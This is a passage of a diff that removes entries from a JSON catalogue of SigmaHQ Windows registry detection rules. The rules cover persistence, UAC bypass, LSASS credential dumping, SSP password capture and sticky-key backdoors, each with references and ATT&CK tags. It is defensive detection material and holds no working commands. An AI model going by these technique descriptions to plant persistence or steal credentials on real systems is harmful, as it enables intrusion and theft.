"windows" - } - }, - { - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "value": "New DLL Added to AppCertDlls Registry Key", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.009" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "value": "New DLL Added to AppInit_DLLs Registry Key", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.010" - ], - "creation_date": "2019/10/25", - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", - "value": "Office Application Startup - Office Test", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1137/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.002" - ], - "creation_date": "2020/10/25", - "filename": "registry_event_office_test_regadd.yml", - "author": "omkar72", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence registry keys for Recycle Bin", - "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", - "value": "Registry Persistence Mechanisms in Recycle Bin", - "meta": { - "refs": [ - "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", - "https://persistence-info.github.io/Data/recyclebin.html", - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2021/11/18", - "filename": "registry_event_persistence_recycle_bin.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "value": "PortProxy Registry Key", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://adepts.of0x.cc/netsh-portproxy-code/", - "https://www.dfirnotes.net/portproxy_detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2021/06/22", - "filename": "registry_event_portproxy_registry_key.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "medium", - "falsepositive": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "value": "RedMimicry Winnti Playbook Registry Manipulation", - "meta": { - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/06/24", - "filename": "registry_event_redmimicry_winnti_reg.yml", - "author": "Alexander Rausch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "value": "WINEKEY Registry Modification", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2020/10/30", - "filename": "registry_event_runkey_winekey.yml", - "author": "omkar72", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "value": "Run Once Task Configuration in Registry", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/11/15", - "filename": "registry_event_runonce_persistence.yml", - "author": "Avneet Singh @v3t0_, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate modification of the registry key by legitimate program" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "value": "Shell Open Registry Keys Manipulation", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", - "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ], - "creation_date": "2021/08/30", - "filename": "registry_event_shell_open_keys_manipulation.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", - "value": "SilentProcessExit Monitor Registration for LSASS", - "meta": { - "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.007" - ], - "creation_date": "2021/02/26", - "filename": "registry_event_silentprocessexit_lsass.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "value": "Security Support Provider (SSP) Added to LSA Configuration", - "meta": { - "refs": [ - "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.005" - ], - "creation_date": "2019/01/18", - "filename": "registry_event_ssp_added_lsa_config.yml", - "author": "iwillkeepwatch", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "value": "Sticky Key Like Backdoor Usage - Registry", - "meta": { - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ], - "creation_date": "2018/03/15", - "filename": "registry_event_stickykey_like_backdoor.yml", - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", - "value": "Atbroker Registry Change", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2020/10/13", - "filename": "registry_event_susp_atbroker_change.yml", - "author": "Mateusz Wydra, oscd.community", - "level": "medium", - "falsepositive": [ - "Creation of non-default, legitimate at usage" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "value": "Suspicious Run Key from Download", - "meta": { - "refs": [ - "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/01", - "filename": "registry_event_susp_download_run_key.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software installers downloaded and used by users" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "value": "DLL Load via LSASS", - "meta": { - "refs": [ - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", - "https://twitter.com/SBousseaden/status/1183745981189427200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" - ], - "creation_date": "2019/10/16", - "filename": "registry_event_susp_lsass_dll_load.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", - "value": "Suspicious Camera and Microphone Access", - "meta": { - "refs": [ - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" - ], - "creation_date": "2020/06/07", - "filename": "registry_event_susp_mic_cam_access.yml", - "author": "Den Iuzvyk", - "level": "high", - "falsepositive": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", - "value": "Windows Registry Trust Record Modification", - "meta": { - "refs": [ - "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", - "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2020/02/19", - "filename": "registry_event_trust_record_modification.yml", - "author": "Antonlovesdnb", - "level": "medium", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "logsource.category": "registry_event", - "logsource.product": "windows" - } - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", - "value": "Abusing Windows Telemetry For Persistence - Registry", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ], - "creation_date": "2020/09/29", - "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", - "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", - "value": "User Account Hidden By Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ], - "creation_date": "2022/08/20", - "filename": "registry_set_add_hidden_user.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "value": "Registry Persitence via Service in Safe Mode", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/04/04", - "filename": "registry_set_add_load_service_in_safe_mode.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "value": "Add Port Monitor Persistence in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "creation_date": "2021/12/30", - "filename": "registry_set_add_port_monitor.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "uuid": "092af964-4233-4373-b4ba-d86ea2890288", - "value": "Add Debugger Entry To AeDebug For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/aedebug.html", - "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_aedebug_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "value": "Allow RDP Remote Assistance Feature", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitmate use of the feature (alerts should be investigated either way)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "9df5f547-c86a-433e-b533-f2794357e242", - "value": "Classes Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_classes.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", - "value": "Common Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_common.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "value": "CurrentControlSet Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "value": "CurrentVersion Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", - "value": "CurrentVersion NT Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", - "value": "Internet Explorer Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "value": "Office Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_office.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "value": "Session Manager Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", - "value": "System Scripts Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - 